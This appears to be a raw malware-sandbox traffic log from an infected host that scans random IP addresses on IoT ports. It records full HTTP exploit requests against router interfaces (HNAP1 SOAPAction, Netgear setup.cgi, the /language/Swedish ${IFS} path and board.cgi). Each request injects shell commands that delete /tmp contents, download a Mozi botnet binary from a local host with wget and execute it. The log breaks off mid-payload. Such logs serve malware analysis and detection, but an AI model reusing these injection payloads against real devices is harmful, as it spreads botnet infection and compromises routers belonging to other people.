Source: global traffic | TCP traffic: 192.168.2.23:43076 -> 44.87.62.109:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:41696 -> 204.222.113.90:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:37926 -> 196.90.18.214:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:54196 -> 74.40.185.41:49152 |
Source: global traffic | TCP traffic: 192.168.2.23:48750 -> 50.183.64.105:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:57648 -> 189.5.17.154:49152 |
Source: global traffic | TCP traffic: 192.168.2.23:36196 -> 87.218.139.104:5555 |
Source: global traffic | TCP traffic: 192.168.2.23:56564 -> 141.39.142.235:49152 |
Source: global traffic | TCP traffic: 192.168.2.23:34032 -> 173.168.230.134:5555 |
Source: global traffic | TCP traffic: 192.168.2.23:42898 -> 135.132.50.2:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:43430 -> 155.117.206.189:7574 |
Source: global traffic | TCP traffic: 192.168.2.23:60896 -> 187.123.230.15:49152 |
Source: global traffic | TCP traffic: 192.168.2.23:47806 -> 30.183.116.123:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:38182 -> 15.47.138.219:7574 |
Source: global traffic | TCP traffic: 192.168.2.23:41508 -> 106.99.159.31:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:32996 -> 93.179.249.7:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:33710 -> 86.149.250.90:81 |
Source: global traffic | TCP traffic: 192.168.2.23:56454 -> 1.186.104.107:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:45788 -> 17.37.210.45:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:33682 -> 154.40.176.203:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:60478 -> 18.96.20.44:7574 |
Source: global traffic | TCP traffic: 192.168.2.23:52610 -> 37.75.243.243:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:34644 -> 167.25.83.96:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:35996 -> 39.139.127.27:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:53524 -> 28.49.67.223:7574 |
Source: global traffic | TCP traffic: 192.168.2.23:52930 -> 142.88.201.162:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:37750 -> 180.24.184.106:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:42132 -> 33.4.10.136:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:50096 -> 180.80.137.123:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:51034 -> 131.143.33.147:49152 |
Source: global traffic | TCP traffic: 192.168.2.23:45856 -> 203.30.37.220:81 |
Source: global traffic | TCP traffic: 192.168.2.23:37320 -> 71.87.10.180:81 |
Source: global traffic | TCP traffic: 192.168.2.23:40188 -> 131.201.134.61:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:59334 -> 23.59.67.176:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:49492 -> 8.161.244.39:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:58018 -> 164.245.55.194:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:44800 -> 157.212.14.189:7574 |
Source: global traffic | TCP traffic: 192.168.2.23:35216 -> 176.13.132.57:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:54940 -> 142.203.21.215:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:48684 -> 90.190.106.86:7574 |
Source: global traffic | TCP traffic: 192.168.2.23:46082 -> 79.158.209.144:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:57140 -> 180.72.77.231:8080 |
Source: global traffic | TCP traffic: 192.168.2.23:42284 -> 188.211.80.92:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:41116 -> 202.86.252.99:37215 |
Source: global traffic | TCP traffic: 192.168.2.23:37666 -> 168.170.73.87:49152 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 73.200.97.48:1023 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 168.1.29.187:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 48.206.148.192:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 40.18.22.171:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 40.98.164.223:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 176.12.232.2:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 145.135.118.204:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 180.213.220.125:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 18.219.84.147:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 18.239.250.11:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 62.127.244.68:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 91.174.136.141:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 58.207.50.87:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 88.60.130.88:1023 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 44.184.27.87:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 32.128.184.173:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 136.26.139.2:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 106.174.193.199:1023 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 154.42.87.191:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 95.66.109.66:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 194.90.140.138:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 1.254.14.188:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 1.139.65.221:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 147.153.130.88:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 23.253.150.110:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 47.122.9.94:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 9.250.80.191:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 167.225.142.118:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 95.95.10.141:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 206.86.250.97:1023 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 141.149.87.107:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 222.236.44.101:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 57.170.53.252:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 173.5.24.192:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:59284 -> 75.7.224.140:5555 |
Source: global traffic | TCP traffic: 192.168.2.23:45682 -> 86.218.177.227:7574 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 194.121.42.217:1023 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 42.220.29.36:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 95.18.160.31:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 190.66.28.210:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 35.70.9.121:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 68.93.148.57:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 94.173.147.55:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 62.57.142.53:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 202.243.251.184:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 218.5.113.13:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 1.70.131.88:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 151.70.111.225:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 193.116.200.219:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 78.73.127.74:1023 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 222.235.111.175:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 78.54.254.32:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:24176 -> 206.153.201.153:2323 |
Source: global traffic | TCP traffic: 192.168.2.23:33082 -> 107.190.50.203:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:40410 -> 197.25.112.91:81 |
Source: global traffic | TCP traffic: 192.168.2.23:47568 -> 92.64.112.242:8443 |
Source: global traffic | TCP traffic: 192.168.2.23:53454 -> 108.155.169.234:7574 |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 64.34.159.178:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 207.154.230.111:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 185.199.110.112:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.73.33.104:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 190.166.198.45:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 